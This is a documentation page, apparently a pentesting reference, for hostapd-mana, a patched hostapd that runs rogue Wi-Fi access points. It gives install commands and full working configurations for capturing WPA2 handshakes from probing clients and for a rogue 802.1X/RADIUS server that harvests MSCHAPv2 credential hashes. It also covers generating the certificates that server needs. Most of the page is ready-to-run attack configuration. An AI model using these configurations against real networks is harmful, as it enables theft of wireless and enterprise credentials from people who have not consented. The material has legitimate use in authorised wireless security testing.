Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

hostapd-mana is a patched version of hostapd that adds rogue AP capabilities. It responds to client probe requests to capture WPA2 handshakes from clients probing for offline networks, and captures MSCHAPv2 credentials from WPA Enterprise clients that connect to a rogue 802.1X server.

Install

# From package
sudo apt install hostapd-mana

# From source
sudo apt install libssl-dev libnl-3-dev libnl-genl-3-dev
git clone https://github.com/sensepost/hostapd-mana.git
cd hostapd-mana/hostapd && make && sudo make install

Usage

sudo hostapd-mana <config.conf>

Config: WPA2 PSK Handshake Capture

Captures handshakes from clients probing for a WPA2 network that is not currently in range. hostapd.conf: 
interface=wlan1
driver=nl80211
hw_mode=g
channel=<CHANNEL>
ssid=<TARGET-SSID>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
Stop with CTRL+C when AP-STA-POSSIBLE-PSK-MISMATCH appears.

Config: WPA Enterprise Credential Capture

Runs a rogue 802.1X/RADIUS server. Captures MSCHAPv2 hashes from connecting clients. Requires FreeRADIUS certificates, see FreeRADIUS section below. network.conf: 
ssid=<TARGET-SSID>
interface=<MANAGED-INTERFACE>
driver=nl80211
channel=<CHANNEL>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
EAP user file (/etc/hostapd-mana/mana.eap_user): 
*    PEAP,TTLS,TLS,FAST
"t"  TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "pass"  [2]

Key Config Options

OptionDescription
mana_wpe=1Enable WPE (credential capture)
mana_credout=<file>Path to write captured credentials
mana_eapsuccess=1Send EAP-Success to keep client connected
mana_eaptls=1Enable EAP-TLS capture
mana_wpaout=<file>Write WPA handshakes to hccapx file

FreeRADIUS Certificate Generation

Required for WPA Enterprise rogue AP: 
sudo apt install freeradius freeradius-utils
cd /etc/freeradius/3.0/certs
nano ca.cnf       # set CA details (country, org, CN)
nano server.cnf   # set server details
rm dh
make